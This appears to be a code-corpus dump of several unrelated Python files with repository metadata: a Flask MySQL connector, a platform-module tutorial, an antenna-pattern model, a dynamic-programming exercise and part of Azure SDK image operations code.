def compatibility_or_constraints(self, compatibility: Iterable[str] | None) -> tuple[str, ...]:
"""Return either the given `compatibility` field or the global interpreter constraints.
If interpreter constraints are supplied by the CLI flag, return those only.
"""
if self.options.is_flagged("interpreter_constraints"):
return self.interpreter_constraints
return tuple(compatibility or self.interpreter_constraints)
def compatibilities_or_constraints(
self, compatibilities: Iterable[Iterable[str] | None]
) -> tuple[str, ...]:
return tuple(
constraint
for compatibility in compatibilities
for constraint in self.compatibility_or_constraints(compatibility)
)
| [
"noreply@github.com"
] | pantsbuild.noreply@github.com |
7e7b13cc713a73b93b9922fa4890545534bec49f | 149e9e52304a970ffb256f290fce5f614c9e20c4 | /Python Programming language/DataCampPractice/Corso_CISCO_netacad/modules/platform_module/m9_platform.py | 418ca4b294f6305bd778bfbbc88fc1fb4623c30e | [] | no_license | Pasquale-Silv/Improving_Python | 7451e0c423d73a91fa572d44d3e4133b0b4f5c98 | 96b605879810a9ab6c6459913bd366b936e603e4 | refs/heads/master | 2023-06-03T15:00:21.554783 | 2021-06-22T15:26:28 | 2021-06-22T15:26:28 | 351,806,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | """
But sometimes you want to know more - for example, the name of the OS which hosts Python,
and some characteristics describing the hardware that hosts the OS.
There is a module providing some means to allow you to know where you are and what components work for you.
The module is named
platform
We'll show you some of the functions it provides to you.
The platform module lets you access the underlying platform's data, i.e.,
hardware, operating system, and interpreter version information.
There is a function that can show you all the underlying layers in one glance, named platform, too.
It just returns a string describing the environment; thus,
its output is rather addressed to humans than to automated processing (you'll see it soon).
This is how you can invoke it:
platform(aliased = False, terse = False)
"""
# Demo of platform.platform(aliased=False, terse=False) output variants.
from platform import platform
print(platform())  # full human-readable platform string
print(platform(1))  # aliased=1: use aliased system names where applicable
print(platform(0, 1))  # terse=1: brief form of the platform string
print(platform(0, 1))  # NOTE(review): duplicate of the previous call - possibly a typo
| [
"55320885+Pasquale-Silv@users.noreply.github.com"
] | 55320885+Pasquale-Silv@users.noreply.github.com |
b4eadce6676c593ff4b4b8f33c4ab61fae97d601 | 77b16dcd465b497c22cf3c096fa5c7d887d9b0c2 | /Quintana_Jerrod/Assignments/f+sql_projects/login_registration/mysqlconnection.py | 4c155f5e9f6da54e3176b393d8fb413e17530147 | [
"MIT"
] | permissive | curest0x1021/Python-Django-Web | a7cf8a45e0b924ce23791c18f6a6fb3732c36322 | 6264bc4c90ef1432ba0902c76b567cf3caaae221 | refs/heads/master | 2020-04-26T17:14:20.277967 | 2016-10-18T21:54:39 | 2016-10-18T21:54:39 | 173,706,702 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,250 | py | """ import the necessary modules """
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import text
# Create a class that will give us an object that we can use to connect to a database
class MySQLConnection(object):
def __init__(self, app, db):
config = {
'host': 'localhost',
'database': 'login_registration', # we got db as an argument
# my note: The database name above is the only db from the original copy of this document that changes
'user': 'root',
'password': '',
# password is blank because I never set it
'port': '3306' # change the port to match the port your SQL server is running on
}
# this will use the above values to generate the path to connect to your sql database
DATABASE_URI = "mysql://{}:{}@127.0.0.1:{}/{}".format(config['user'], config['password'], config['port'], config['database'])
app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
# establish the connection to database
self.db = SQLAlchemy(app)
# this is the method we will use to query the database
def query_db(self, query, data=None):
result = self.db.session.execute(text(query), data)
if query[0:6].lower() == 'select':
# if the query was a select
# convert the result to a list of dictionaries
list_result = [dict(r) for r in result]
# return the results as a list of dictionaries
return list_result
elif query[0:6].lower() == 'insert':
# if the query was an insert, return the id of the
# commit changes
self.db.session.commit()
# row that was inserted
return result.lastrowid
else:
# if the query was an update or delete, return nothing and commit changes
self.db.session.commit()
# This is the module method to be called by the user in server.py. Make sure to provide the db name!
def MySQLConnector(app, db):
    """Factory returning a MySQLConnection bound to `app` and database `db`."""
    connection = MySQLConnection(app, db)
    return connection
| [
"43941751+curest0x1021@users.noreply.github.com"
] | 43941751+curest0x1021@users.noreply.github.com |
0fbd804353c409e267bd017d27c00640523191a2 | 1b787489aab83b2e06a8f658ee8e01a10eb01998 | /antpat/reps/hamaker.py | f4272ea25cf8388cb1ffd0520e9dc8142dc481d5 | [
"ISC"
] | permissive | daydreamer2023/AntPat | 7edd471bd1e0997eb5befa029120ba13b861f106 | 6dc416a1593346421337400f880e7159a07447f6 | refs/heads/master | 2022-01-22T17:52:39.300557 | 2019-08-15T08:41:24 | 2019-08-15T08:41:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,368 | py | #!/usr/bin/python
"""Hamaker's analytic antenna pattern model."""
#TobiaC 2015-11-29 (2015-07-31)
import sys
#sys.path.append('/home/tobia/projects/BeamFormica/AntPatter/')
import math
import cmath
import scipy.special
import numpy
from antpat import dualpolelem
from antpat.reps.sphgridfun import tvecfun, pntsonsphere
import matplotlib.pyplot as plt
HA_LBAfile_default = ''
class HamakerPolarimeter(object):
    """The Hamaker analytic polarimeter model."""

    nr_pols = 2  # number of polarization channels

    def __init__(self, artsdata):
        """Initialize from an Arts coefficient data dict (one default set each
        for the HBA and the LBA)."""
        for key in ('coefs', 'HAcoefversion', 'HAcoefband', 'HAcoefnrelem',
                    'freq_center', 'freq_range', 'channels'):
            setattr(self, key, artsdata[key])
        self.nr_bands = len(self.coefs)
        self.freqintervs = (self.freq_center - self.freq_range,
                            self.freq_center + self.freq_range)

    def getfreqs(self):
        """Return the nominal channel center frequencies."""
        return self.channels

    def getJonesAlong(self, freqvals, theta_phi):
        """Compute Jones matrices for given frequencies and directions.

        `freqvals` is a list of frequencies in Hz and `theta_phi` a pair of
        theta, phi arrays; the output is Jones[freq, dir_th, dir_ph, polchan, comp]
        (the frequency axis is squeezed out for a single frequency).
        """
        mask_horizon = True
        theta = numpy.array(theta_phi[0])
        phi = numpy.array(theta_phi[1])
        freqvals = numpy.array(freqvals)
        (k_ord, TH_ord, FR_ord, nr_pol) = self.coefs.shape
        # Normalized frequency relative to the band center.
        freqn = (freqvals - self.freq_center) / self.freq_range
        if len(freqvals) > 1:
            out_shape = freqvals.shape + theta.shape
        else:
            out_shape = theta.shape
        response = numpy.zeros(out_shape + (2, 2), dtype=complex)
        for ki in range(k_ord):
            # Polynomial in (freqn, theta) for each polarization channel.
            P = numpy.zeros((nr_pol,) + out_shape, dtype=complex)
            for THi in range(TH_ord):
                for FRi in range(FR_ord):
                    fac = numpy.multiply.outer(freqn ** FRi, theta ** THi).squeeze()
                    P[0, ...] += self.coefs[ki, THi, FRi, 0] * fac
                    P[1, ...] += self.coefs[ki, THi, FRi, 1] * fac
            ang = (-1) ** ki * (2 * ki + 1) * phi
            cos_a = numpy.cos(ang)
            sin_a = numpy.sin(ang)
            response[..., 0, 0] += cos_a * P[0, ...]
            response[..., 0, 1] += -sin_a * P[1, ...]
            response[..., 1, 0] += sin_a * P[0, ...]
            response[..., 1, 1] += cos_a * P[1, ...]
        if mask_horizon:
            # Zero out the beam below the horizon (theta > pi/2).
            mh = numpy.ones(out_shape + (1, 1))
            mh[..., numpy.where(theta > numpy.pi / 2), 0, 0] = 0.
            response = mh * response
        return response
def plotElemPat(artsdata, frequency = 55.0e6):
    """Plot the Hamaker-Arts element pattern over the full hemisphere,
    one figure per polarization channel."""
    THETA, PHI = pntsonsphere.ZenHemisphGrid() #theta=0.2rad for zenith anomaly
    polarimeter = HamakerPolarimeter(artsdata)
    jones = polarimeter.getJonesAlong([frequency], (THETA, PHI))
    for polchan in (0, 1):
        E_th = numpy.squeeze(jones[..., polchan, 0])
        E_ph = numpy.squeeze(jones[..., polchan, 1])
        tvecfun.plotvfonsph(THETA, PHI, E_th, E_ph, freq=frequency, vcoord='Ludwig3')
def showAnomaly():
    """Demonstrates the anomaly of the Hamaker-Arts model close to zenith."""
    frequency = 225e6
    nrPnts = 200
    timeAng = 0.5
    timeAngs = numpy.linspace(-timeAng, timeAng, nrPnts)/2.0
    theta0 = 0.5
    # Track of (theta, phi) directions across the near-zenith transit.
    thetas, phis = pntsonsphere.getTrack(theta0, 0*math.pi/4, theta0-0.001, timeAngs)
    # NOTE(review): HA_LBAfile_default is a path string, but HamakerPolarimeter.__init__
    # indexes its argument like an artsdata dict - confirm this still runs.
    hp = HamakerPolarimeter(HA_LBAfile_default)
    #jones = hp.getJonesAlong([frequency], (phis+1*5*math.pi/4, math.pi/2-thetas))
    # NOTE(review): getJonesAlong takes (theta, phi); here a phi-like track is passed
    # first - verify the intended argument order.
    jones = hp.getJonesAlong([frequency], (phis+1*5*math.pi/4, thetas))
    EsTh = numpy.squeeze(jones[...,0,0])
    EsPh = numpy.squeeze(jones[...,0,1])
    # Top panel: the sky track in azimuth/elevation.
    plt.subplot(2,1,1)
    plt.plot(phis/math.pi*180, 90-thetas/math.pi*180, '*')
    plt.xlabel('Azimuth [deg]')
    plt.ylabel('Elevation [deg]')
    # Bottom panel: gain of the theta component along the transit.
    plt.subplot(2,1,2)
    plt.plot(timeAngs*60, numpy.abs(EsTh))
    plt.xlabel('Transit time [min]')
    plt.ylabel('Gain [rel.]')
    plt.show()
def getJones(freq, az, el):
    """Print the Jones matrix of the HA model for a frequency and direction.

    NOTE(review): the freq, az, el parameters are currently ignored - the call
    below hard-codes 10 MHz and direction (0.1, 0.2). Python 2 print syntax.
    """
    hp = HamakerPolarimeter(HA_LBAfile_default)
    jones=hp.getJonesAlong([10.e6], (0.1, 0.2))
    print "Jones:"
    print jones
    print "J.J^H:"
    print numpy.dot(jones, jones.conj().transpose()).real
    IXRJ = dualpolelem.getIXRJ(jones)
    print "IXRJ:", 10*numpy.log10(IXRJ),"[dB]"
def _getargs():
    """Parse frequency, azimuth and elevation (floats) from the command line."""
    args = sys.argv
    freq = float(args[1])
    az = float(args[2])
    el = float(args[3])
    return freq, az, el
if __name__ == "__main__":
#plotElemPat(30e6)
showAnomaly()
#HBAmod = HamakerPolarimeter(HA_HBAfile_default)
#jones = HBAmod.getJonesAlong([150e6, 160e6, 170e6], ( [0.1,0.1], [0.3, 0.4]) )
#print jones
| [
"tobia@chalmers.se"
] | tobia@chalmers.se |
def max_increasing_subsequence_sum(nums):
    """Return the maximum sum over strictly increasing subsequences of `nums` (BOJ 11055).

    O(n^2) DP: best[i] is the largest sum of an increasing subsequence ending at i.
    """
    best = [0] * len(nums)
    for i, value in enumerate(nums):
        prefix_best = 0
        for j in range(i):
            if nums[j] < value:
                prefix_best = max(prefix_best, best[j])
        best[i] = prefix_best + value
    return max(best)


def main():
    """Read n and the sequence from stdin and print the answer."""
    n = int(input())
    nums = list(map(int, input().split()))
    # Slice defensively to the declared length; covers the n == 1 case too.
    print(max_increasing_subsequence_sum(nums[:n]))


if __name__ == "__main__":
    main()
"whssodi@gmail.com"
] | whssodi@gmail.com |
942f086421c66cf688e405fc33af1707af5ebc2b | d7016f69993570a1c55974582cda899ff70907ec | /sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2022_03_01/operations/_images_operations.py | 2edb1f0d7e16c55f9a9d125bf0a0d5a541741cbe | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 45,959 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Iterable, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from ..._serialization import Serializer
from .._vendor import _convert_request, _format_url_section
# `Literal` moved into `typing` in Python 3.8; fall back to typing_extensions before that.
if sys.version_info >= (3, 8):
    from typing import Literal  # pylint: disable=no-name-in-module, ungrouped-imports
else:
    from typing_extensions import Literal  # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
# Optional per-call hook that post-processes the pipeline response.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
# Shared serializer for this module's request builders; client-side validation is disabled.
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_create_or_update_request(
    resource_group_name: str, image_name: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
    """Build the HTTP PUT request for Images create-or-update; the JSON body is attached by the caller."""
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
    api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
    content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
    accept = _headers.pop("Accept", "application/json")
    # Construct URL
    _url = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
    )  # pylint: disable=line-too-long
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
        "imageName": _SERIALIZER.url("image_name", image_name, "str"),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
    }
    _url: str = _format_url_section(_url, **path_format_arguments)  # type: ignore
    # Construct parameters
    _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    # Construct headers
    if content_type is not None:
        _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
    _headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
    return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs)
def build_update_request(resource_group_name: str, image_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
    """Build the HTTP PATCH request for an Images partial update; the JSON body is attached by the caller."""
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
    api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
    content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
    accept = _headers.pop("Accept", "application/json")
    # Construct URL
    _url = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
    )  # pylint: disable=line-too-long
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
        "imageName": _SERIALIZER.url("image_name", image_name, "str"),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
    }
    _url: str = _format_url_section(_url, **path_format_arguments)  # type: ignore
    # Construct parameters
    _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    # Construct headers
    if content_type is not None:
        _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
    _headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
    return HttpRequest(method="PATCH", url=_url, params=_params, headers=_headers, **kwargs)
def build_delete_request(resource_group_name: str, image_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
    """Build the HTTP DELETE request for an image (no request body)."""
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
    api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
    accept = _headers.pop("Accept", "application/json")
    # Construct URL
    _url = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
    )  # pylint: disable=line-too-long
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
        "imageName": _SERIALIZER.url("image_name", image_name, "str"),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
    }
    _url: str = _format_url_section(_url, **path_format_arguments)  # type: ignore
    # Construct parameters
    _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    # Construct headers
    _headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
    return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_get_request(
    resource_group_name: str, image_name: str, subscription_id: str, *, expand: Optional[str] = None, **kwargs: Any
) -> HttpRequest:
    """Build the HTTP GET request for a single image; `expand` adds the optional $expand query parameter."""
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
    api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
    accept = _headers.pop("Accept", "application/json")
    # Construct URL
    _url = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}",
    )  # pylint: disable=line-too-long
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
        "imageName": _SERIALIZER.url("image_name", image_name, "str"),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
    }
    _url: str = _format_url_section(_url, **path_format_arguments)  # type: ignore
    # Construct parameters
    if expand is not None:
        _params["$expand"] = _SERIALIZER.query("expand", expand, "str")
    _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    # Construct headers
    _headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
    return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_by_resource_group_request(resource_group_name: str, subscription_id: str, **kwargs: Any) -> HttpRequest:
    """Build the HTTP GET request listing all images in one resource group."""
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
    api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
    accept = _headers.pop("Accept", "application/json")
    # Construct URL
    _url = kwargs.pop(
        "template_url",
        "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images",
    )  # pylint: disable=line-too-long
    path_format_arguments = {
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
    }
    _url: str = _format_url_section(_url, **path_format_arguments)  # type: ignore
    # Construct parameters
    _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    # Construct headers
    _headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
    return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
def build_list_request(subscription_id: str, **kwargs: Any) -> HttpRequest:
    """Build the HTTP GET request listing all images in the subscription."""
    _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
    _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
    api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
    accept = _headers.pop("Accept", "application/json")
    # Construct URL
    _url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/providers/Microsoft.Compute/images")
    path_format_arguments = {
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
    }
    _url: str = _format_url_section(_url, **path_format_arguments)  # type: ignore
    # Construct parameters
    _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
    # Construct headers
    _headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
    return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class ImagesOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.compute.v2022_03_01.ComputeManagementClient`'s
:attr:`images` attribute.
"""
models = _models
    def __init__(self, *args, **kwargs):
        """Store the client, config, serializer and deserializer injected by the service client."""
        input_args = list(args)
        self._client = input_args.pop(0) if input_args else kwargs.pop("client")
        self._config = input_args.pop(0) if input_args else kwargs.pop("config")
        self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
        self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
    def _create_or_update_initial(
        self, resource_group_name: str, image_name: str, parameters: Union[_models.Image, IO], **kwargs: Any
    ) -> _models.Image:
        """Send the initial PUT of the create-or-update long-running operation.

        Accepts either a model (serialized to JSON) or a raw IO payload, and
        deserializes the 200/201 response body into an Image.
        """
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
        cls: ClsType[_models.Image] = kwargs.pop("cls", None)
        content_type = content_type or "application/json"
        _json = None
        _content = None
        # Raw bytes/IO payloads are forwarded as-is; models are serialized to JSON.
        if isinstance(parameters, (IO, bytes)):
            _content = parameters
        else:
            _json = self._serialize.body(parameters, "Image")
        request = build_create_or_update_request(
            resource_group_name=resource_group_name,
            image_name=image_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            content_type=content_type,
            json=_json,
            content=_content,
            template_url=self._create_or_update_initial.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if response.status_code == 200:
            deserialized = self._deserialize("Image", pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize("Image", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})  # type: ignore
        return deserialized  # type: ignore

    _create_or_update_initial.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
    }
    # Typed overload: model payload, JSON body.
    @overload
    def begin_create_or_update(
        self,
        resource_group_name: str,
        image_name: str,
        parameters: _models.Image,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> LROPoller[_models.Image]:
        """Create or update an image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :param parameters: Parameters supplied to the Create Image operation. Required.
        :type parameters: ~azure.mgmt.compute.v2022_03_01.models.Image
        :keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns either Image or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    # Typed overload: raw IO payload, binary body.
    @overload
    def begin_create_or_update(
        self,
        resource_group_name: str,
        image_name: str,
        parameters: IO,
        *,
        content_type: str = "application/json",
        **kwargs: Any
    ) -> LROPoller[_models.Image]:
        """Create or update an image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :param parameters: Parameters supplied to the Create Image operation. Required.
        :type parameters: IO
        :keyword content_type: Body Parameter content-type. Content type parameter for binary body.
         Default value is "application/json".
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns either Image or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
    @distributed_trace
    def begin_create_or_update(
        self, resource_group_name: str, image_name: str, parameters: Union[_models.Image, IO], **kwargs: Any
    ) -> LROPoller[_models.Image]:
        """Create or update an image.

        :param resource_group_name: The name of the resource group. Required.
        :type resource_group_name: str
        :param image_name: The name of the image. Required.
        :type image_name: str
        :param parameters: Parameters supplied to the Create Image operation. Is either a model type or
         a IO type. Required.
        :type parameters: ~azure.mgmt.compute.v2022_03_01.models.Image or IO
        :keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
         Default value is None.
        :paramtype content_type: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns either Image or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.compute.v2022_03_01.models.Image]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
        cls: ClsType[_models.Image] = kwargs.pop("cls", None)
        polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token: Optional[str] = kwargs.pop("continuation_token", None)
        # Only issue the initial request when not resuming from a continuation token.
        if cont_token is None:
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                image_name=image_name,
                parameters=parameters,
                api_version=api_version,
                content_type=content_type,
                cls=lambda x, y, z: x,
                headers=_headers,
                params=_params,
                **kwargs
            )
        kwargs.pop("error_map", None)

        def get_long_running_output(pipeline_response):
            # Deserialize the final polled response into an Image model.
            deserialized = self._deserialize("Image", pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized

        if polling is True:
            polling_method: PollingMethod = cast(PollingMethod, ARMPolling(lro_delay, **kwargs))
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore

    begin_create_or_update.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}"
    }
    def _update_initial(
        self, resource_group_name: str, image_name: str, parameters: Union[_models.ImageUpdate, IO], **kwargs: Any
    ) -> _models.Image:
        """Send the initial PATCH of the update LRO and return the first response."""
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})

        _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: Literal["2022-03-01"] = kwargs.pop("api_version", _params.pop("api-version", "2022-03-01"))
        content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
        cls: ClsType[_models.Image] = kwargs.pop("cls", None)

        content_type = content_type or "application/json"
        _json = None
        _content = None
        # IO/bytes payloads are sent verbatim; model payloads are serialized to JSON.
        if isinstance(parameters, (IO, bytes)):
            _content = parameters
        else:
            _json = self._serialize.body(parameters, "ImageUpdate")

        request = build_update_request(
            resource_group_name=resource_group_name,
            image_name=image_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            content_type=content_type,
            json=_json,
            content=_content,
            template_url=self._update_initial.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response: PipelineResponse = self._client._pipeline.run(  # pylint: disable=protected-access
            request, stream=False, **kwargs
        )

        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

